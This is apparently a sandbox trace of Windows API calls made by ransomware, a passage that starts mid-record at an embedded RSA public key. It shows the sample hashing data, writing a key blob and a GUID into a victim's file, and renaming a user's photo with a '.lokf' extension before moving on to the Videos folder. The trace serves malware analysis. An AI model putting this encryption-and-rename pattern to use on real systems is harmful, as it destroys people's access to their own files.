KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.101] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8588) returned 1 [0060.102] CryptCreateHash (in: hProv=0x6b8588, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.102] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.102] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.102] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.102] GetLastError () returned 0x0 [0060.102] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.102] CryptReleaseContext (hProv=0x6b8588, dwFlags=0x0) returned 1 [0060.102] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.102] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.102] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.102] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.103] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x2fef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.103] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.103] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.103] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.103] CloseHandle (hObject=0x5cc) returned 1 [0060.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262b28 [0060.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0060.104] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\xjvwDn0SBdqUu-KgqN.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\xjvwdn0sbdquu-kgqn.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\xjvwDn0SBdqUu-KgqN.jpg.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\xjvwdn0sbdquu-kgqn.jpg.lokf")) returned 1 [0060.105] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9665af0, ftCreationTime.dwHighDateTime=0x1d4cca2, ftLastAccessTime.dwLowDateTime=0x474e7720, ftLastAccessTime.dwHighDateTime=0x1d4c776, ftLastWriteTime.dwLowDateTime=0x474e7720, ftLastWriteTime.dwHighDateTime=0x1d4c776, nFileSizeHigh=0x0, nFileSizeLow=0x2fef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xjvwDn0SBdqUu-KgqN.jpg", cAlternateFileName="XJVWDN~1.JPG")) returned 0 [0060.105] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8610 | out: hHeap=0x660000) returned 1 [0060.105] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b588 [0060.105] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.110] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\") returned="27nF\\" [0060.110] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0060.111] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.111] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.111] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.111] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.111] PathFindFileNameW (pszPath="") returned="" [0060.111] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8d443130, ftCreationTime.dwHighDateTime=0x1d4cddd, ftLastAccessTime.dwLowDateTime=0x27e7be0, ftLastAccessTime.dwHighDateTime=0x1d4cbe5, ftLastWriteTime.dwLowDateTime=0x27e7be0, ftLastWriteTime.dwHighDateTime=0x1d4cbe5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.111] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.111] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8d443130, ftCreationTime.dwHighDateTime=0x1d4cddd, ftLastAccessTime.dwLowDateTime=0x27e7be0, ftLastAccessTime.dwHighDateTime=0x1d4cbe5, 